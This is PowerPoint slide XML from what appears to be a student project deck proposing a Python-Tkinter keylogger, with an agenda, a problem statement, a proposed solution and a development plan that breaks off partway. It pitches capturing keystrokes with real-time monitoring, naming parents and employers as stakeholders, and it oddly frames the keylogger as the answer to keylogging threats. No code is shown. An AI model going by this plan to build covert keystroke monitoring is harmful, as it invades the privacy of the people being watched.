                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Problem Statement </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Proposed Solution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>System Development Approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Result </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Future Scope</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Problem Statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="702000"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="629280" lvl="1" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629280" lvl="1" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629280" lvl="1" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In the era of digital transformation, cybersecurity threats pose significant risks to individuals and organizations worldwide. One such threat is the unauthorized access to sensitive information through keystroke logging, where malicious actors can capture keystrokes to obtain passwords, personal data, and other confidential information. Existing keylogger solutions often lack adequate security measures and user-friendly interfaces, leaving users vulnerable to cyber attacks and privacy breaches.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629280" lvl="1" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629280" lvl="1" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Boo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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Proposed Solution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578880" y="1440000"/>
            <a:ext cx="11613240" cy="5563440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>To address the challenges posed by keystroke logging threats, we propose the development of an advanced Python-Tkinter based keylogger application with enhanced security features and usability. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>This keylogger will employ sophisticated encryption techniques to protect captured data and ensure user privacy. Additionally, it will offer an intuitive and customizable user interface, allowing users to easily configure settings and monitor keyboard activity in real-time. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>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581040" y="662400"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>System  Approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180000" y="1800000"/>
            <a:ext cx="12060000" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325440" y="1079280"/>
            <a:ext cx="11229480" cy="5707800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="198360" rIns="0" bIns="198360" numCol="1" spcCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1100" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Requirement Analysis: Understand stakeholder needs, such as parents and employers, </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>and define keylogger requirements.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Design: Develop the keylogger's functionalities, user interface, and data handling mechanisms.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implementation: Code the keylogger using Python and Tkinter, and conduct rigorous testing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Deployment: Create installation packages, configure settings, and provide comprehensive </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>documentation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Maintenance: Monitor performance, provide updates, offer user support, and ensure adherence </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
